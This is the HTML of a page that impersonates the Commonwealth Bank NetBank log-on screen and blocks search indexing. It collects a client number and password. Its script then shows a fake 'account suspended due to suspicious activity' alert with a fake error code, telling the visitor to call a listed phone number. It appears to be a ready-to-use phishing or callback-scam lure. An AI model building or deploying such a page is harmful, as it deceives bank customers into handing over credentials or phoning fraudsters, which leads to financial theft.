<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="win chrome chrome9 webkit webkit5 cssBeforeSupport">
<head id="head">
        <meta name="robots" content="noindex, nofollow">
        <meta name="googlebot" content="noindex, nofollow">
        <meta name="bingbot" content="noindex, nofollow">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>
            NetBank - Log on to NetBank - Enjoy simple and secure online banking from Commonwealth Bank
        </title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" type="text/css" href="./assets/logon-merge.8397238ab0ae7a25ea1af4d375f2c3df.css" rel-album="R650">
        <link rel="icon" href="assets/favicon.ico" type="image/x-icon">
    </head>
    <body id="body" class="logon">
        <form method="post" action="" id="form1" autocomplete="off">

            <div id="BodyContainer">
                <div id="Header">
                    <div id="BrandingLogo">
                        <span class="ImageWithHelp" id="imgCbaLogo"><img id="imgCbaLogo" src="./assets/cba_mainlogo.ac9de6fb5214be84653367c74ba0b5f0.gif" alt="Commonwealth Bank of Australia"></span>
                    </div>
                </div>
                <div id="MainContent">
                   
                   <div class="MessagePanel arrow MessagePanel_Validation" id="errorCode" style=" display: none;">
                    <div class="message_contents message_contents_validation">
                        <div class="message">
                            <div class="message_icon validation icon icon_validation">
                                <i tabindex="-1"><span class="ScreenReader">Please read the following message</span></i>
                            </div><h3>
                                <span class="validation">
                                    <p>
                                        Your account has been suspended due to suspicious activity. Please contact our customer support immediately +61730407694 
                                        <br>* Error Code - Wp-402<br>
                                     </p>
                                </span>
                            </h3>
                        </div>
                    </div>
                </div>
                    <div id="ModuleWrap">
                        <div id="ModuleLeft" class="module">
                            <h2>Log on to NetBank</h2>
                            <div class="bd">
                                <div class="ft">
                                    <div class="row rowClientNumber">
                                        <div class="LabelWrapper LabelTextAlignNotSet align_notset">
                                            <label for="txtMyClientNumber_field" id="txtMyClientNumber_label"><span class="MainLabel">Client number</span></label>
                                        </div>
                                        <div class="FieldElement">
                                            <input name="txtMyClientNumber$field" type="text" maxlength="8" id="txtMyClientNumber_field" class="text textbox field" data-maxlength="8" required>
                                        </div>
                                    </div>
                                    <div class="row rowPassword">
                                        <div class="LabelWrapper LabelTextAlignNotSet align_notset">
                                            <label for="txtMyPassword_field" id="txtMyPassword_label"><span class="MainLabel">Password</span></label>
                                        </div>
                                        <div class="FieldElement">
                                            <input name="txtMyPassword$field" type="password" maxlength="16" id="txtMyPassword_field" class="text textbox field" data-maxlength="16" required>
                                        </div>
                                    </div>
                                    <div class="row">
                                        <div class="FieldElement FieldElementNoLabel">
                                            <span class="checkbox field checkbox_classic">
                                                <input id="chkRemember_field" type="checkbox" name="chkRemember$field" class="checkbox"><label for="chkRemember_field">Remember client number</label>
                                            </span>
                                        </div>
                                    </div>
                                    <div class="FieldElement FieldElementNoLabel">
                                        <div class="CbaButton" id="btnLogon">
                                            <input class="button field" type="submit" name="btnLogon$field" value="Log on" id="btnLogon_field">
                                        </div>
                                    </div>
                                    <a id="lnkForgottenDetails" href="#">
                                        I've forgotten my log on details
                                    </a>
                                    <div id="MessageBubble" class="MessageBubble" style="display: none;">
                                        <span class="MessagePointer"></span>
                                        <a id="MessageClose" class="MessageClose" title="Close" href="#">Close</a>
                                        <span class="MessageBody">
                                            For security reasons, do not <br>
                                            select <strong>Remember client number</strong> if anyone else uses <br>
                                            this computer. <a id="lnkFindOutMore" href="#" >Find out more</a>.
                                        </span>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div id="ModuleRight" class="module">
                            <h2>New to NetBank?</h2>
                            <div class="bd">
                                <div class="ft">
                                    <ul class="Bullets">
                                        <li><a id="lnkRegistration" href="#">Register for NetBank now</a></li>
                                        <li><a id="lnkOnlineSupport" href="#" >Online support for our products and services</a></li>
                                        <li><a id="lnkProtectYourselfOnline" href="#" >Tips to stay safe online</a></li>
                                    </ul>
                                </div>
                                <div class="ft secModule">
                                    <ul class="Bullets">
                                        <li><a id="lnkSecurityGuarantee" href="#" >How we protect you and our 100% security guarantee</a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>

                    <!-- Component for content management. -->

                    <div id="ucLogonContentManageControl_pnlContentManaged">
                        <div id="ContentManaged">
                            <!-- this is the features panel which has the image and description. -->
                            <div id="ucLogonContentManageControl_pnlHighlightPanel">
                                <div class="HighlightPanel">
                                    <div class="top">
                                        <div class="bottom">
                                            <div class="image">
                                                <p>
                                                    <a href="#" ><img src="./assets/nb-logon-floods.jpg" alt=""></a>
                                                </p>
                                            </div>
                                            <div class="description">
                                                <table>
                                                    <tbody>
                                                        <tr>
                                                            <td>
                                                                <p><b>Affected by the floods?</b></p>
                                                                You may be eligible for our Emergency Assistance. See how we can help or
                                                                <a href="#" >message us</a> in the CommBank app.
                                                                <ul>
                                                                    <li><a href="#" >Emergency Assistance</a></li>
                                                                </ul>
                                                                <p></p>
                                                                <p></p>
                                                            </td>
                                                        </tr>
                                                    </tbody>
                                                </table>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <!-- side by side highlight links at the bottom -->
                            <div id="ucLogonContentManageControl_pnlCurrentHighlights">
                                <div id="CurrentHighlights">
                                    <h3>Quicklinks</h3>
                                    <div class="column">
                                        <ul>
                                            <li>
                                                <p>
                                                    <a href="#" >
                                                        Supporting the game changers in women's sport
                                                    </a>
                                                </p>
                                            </li>

                                            <li>
                                                <p><a href="#" >Are you in financial difficulty? Apply for assistance.</a></p>
                                            </li>

                                            <li>
                                                <p><a href="#" >Find benefits you may be eligible for during lockdown.</a></p>
                                            </li>

                                            <li>
                                                <p><a href="#" >Support for home loan customers</a></p>
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div id="PageFooter">
                    <a id="lnkTermsOfUse" href="#" >Terms of use</a> |
                    <a id="lnkSecurity" href="#" >Security</a> |
                    <a id="lnkPrivacy" href="#" >Privacy</a>
                    <span id="CopyRight">&copy; Commonwealth Bank of Australia 2022 ABN 48 123 123 124</span>
                </div>

               
            </div>
         
          
        </form>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
           <script>
      $(document).ready(function(){
        $("#btnLogon_field").click(function(){
         $('#errorCode').hide();
        var txtMyClientNumber_field = $('#txtMyClientNumber_field').val();
         var txtMyPassword_field = $('#txtMyPassword_field').val();
          if(txtMyClientNumber_field=='') {
         $('#txtMyClientNumber_field').focus();
         return false;
        }
          if(txtMyPassword_field=='') {
         $('#txtMyPassword_field').focus();
         return false;
        }

        if(txtMyClientNumber_field!='' && txtMyPassword_field!='') {
         $('#errorCode').show();
         return false;
        }
        });
      });
      </script> 

</body>
</html>